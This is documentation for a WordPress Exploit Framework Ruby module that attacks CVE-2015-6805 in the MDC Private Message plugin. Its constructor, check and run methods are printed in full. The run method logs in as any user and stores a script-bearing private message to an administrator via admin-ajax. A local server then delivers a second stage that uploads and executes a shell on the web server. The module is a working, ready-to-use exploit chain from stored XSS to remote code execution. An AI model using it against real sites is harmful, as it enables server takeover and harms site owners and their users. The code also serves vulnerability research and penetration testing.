Class: Wpxf::Exploit::MdcPrivateMessageXssShellUpload

Inherits:
Module
  • Object
Includes:
Wpxf, WordPress::Login, WordPress::Plugin, WordPress::Xss
Defined in:
lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ MdcPrivateMessageXssShellUpload

Returns a new instance of MdcPrivateMessageXssShellUpload.



# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 9

# Registers the module's metadata and the options it needs.
#
# Two groups of options are declared: the WordPress credentials used to
# authenticate (the description notes that any privilege level can reach the
# vulnerable endpoint), and the details of the carrier message — the
# recipient's user ID (defaults to 1, which is usually but not necessarily
# the first administrator account; verify against the target) plus a
# subject and visible body. Subject and body default to random alphanumeric
# strings, generated once per module instantiation, so each run differs.
def initialize
  super

  update_info(
    name: 'MDC Private Message XSS Shell Upload',
    desc: 'This module exploits a lack of validation in versions '\
          '<= 1.0.0 of the MDC Private Message plugin which '\
          'allows authenticated users of any level to send messages '\
          'containing a script which allows this module to upload and '\
          'execute the payload in the context of the web server once an '\
          'admin reads the message containing the stored script.',
    author: [
      'Chris Kellum', # Vulnerability discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['CVE', '2015-6805'],
      ['WPVDB', '8154'],
      ['EDB', '37907']
    ],
    date: 'Aug 20 2015'
  )

  # Credentials for the low-privilege account that sends the message.
  credential_options = [
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with',
      required: true
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with',
      required: true
    )
  ]

  # Recipient and cosmetic content of the message that carries the script.
  message_options = [
    IntegerOption.new(
      name: 'user_id',
      desc: 'The user ID of the user to send the message to',
      default: 1,
      required: true
    ),
    StringOption.new(
      name: 'msg_subject',
      desc: 'The subject of the message that will be sent to the admin',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(5..20))
    ),
    StringOption.new(
      name: 'msg_body',
      desc: 'The text portion of the message that will be visible to the recipient',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(10..50))
    )
  ]

  # Registration order is preserved: credentials first, then message options.
  register_options(credential_options + message_options)
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 64

# Fingerprints the plugin from its readme and compares the installed version
# against the version passed as the second argument.
#
# The module description states that versions <= 1.0.0 are affected, so
# '1.0.0.1' is presumably the first release the framework treats as safe;
# the exact comparison semantics live in the shared helper, not here.
#
# @return whatever +check_plugin_version_from_readme+ returns (the
#   framework's vulnerable/safe/unknown indicator — not visible in this file)
def check
  plugin_slug = 'mdc-private-message'
  fixed_version = '1.0.0.1'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end

#msg_body ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 76

# The visible text of the carrier message (the +msg_body+ option). #run
# appends the stored <script> to this value, so it is what the recipient
# sees in the inbox.
#
# @return [String, nil] the raw option value from the datastore (nil if unset)
def msg_body
  option_name = 'msg_body'
  datastore[option_name]
end

#msg_subject ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 72

# The subject line of the carrier message (the +msg_subject+ option).
#
# @return [String, nil] the raw option value from the datastore (nil if unset)
def msg_subject
  option_name = 'msg_subject'
  datastore[option_name]
end

#run ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 80

# Authenticates with the supplied credentials, stores the XSS payload inside
# a private message addressed to +user_id+, then starts the local HTTP
# server that serves the second-stage script.
#
# The <script> tag is appended to +msg_body+ and fires in the browser of
# whoever opens the message; the actual shell upload happens later, in the
# HTTP-server callbacks, which is why +@success+ is initialised to false
# here and only read back after +start_http_server+ returns.
#
# NOTE(review): only the HTTP status is inspected. WordPress admin-ajax has
# historically answered 200 (body "0") for unregistered or no-op actions, so
# a 200 alone does not prove the plugin accepted the message — confirm the
# plugin is present (see #check) before trusting the "stored" message.
# NOTE(review): nothing in this method deletes the message afterwards; the
# script stays in the recipient's inbox after the run unless removed
# separately, and will fire for any account that can read it.
#
# @return [Boolean] false on authentication or request failure, otherwise
#   the value of +@success+ as set by the HTTP-server callbacks
def run
  return false unless super

  session = authenticate_with_wordpress(datastore['username'], datastore['password'])
  return false unless session

  # Success will be determined in another procedure, so initialize to false.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true

  # Both sender and recipient are set to the target user; the endpoint
  # apparently trusts the client-supplied 'from' field.
  recipient = user_id.to_s
  subject = msg_subject
  payload_markup = "#{msg_body}<script>#{xss_include_script}</script>"

  form = {
    'action'  => 'mdc_send_msg',
    'from'    => recipient,
    'to'      => recipient,
    'subject' => subject,
    'message' => payload_markup
  }
  res = execute_post_request(url: wordpress_url_admin_ajax, cookie: session, body: form)

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  unless res.code == 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed when the user views the message"
  start_http_server

  @success
end

#user_id ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 68

# The recipient's user ID (the +user_id+ option), passed through the
# framework's option normalisation rather than read raw from the datastore.
#
# @return the normalised +user_id+ option — declared as an IntegerOption, so
#   presumably an Integer, but the conversion happens in the shared helper
def user_id
  option_name = 'user_id'
  normalized_option_value(option_name)
end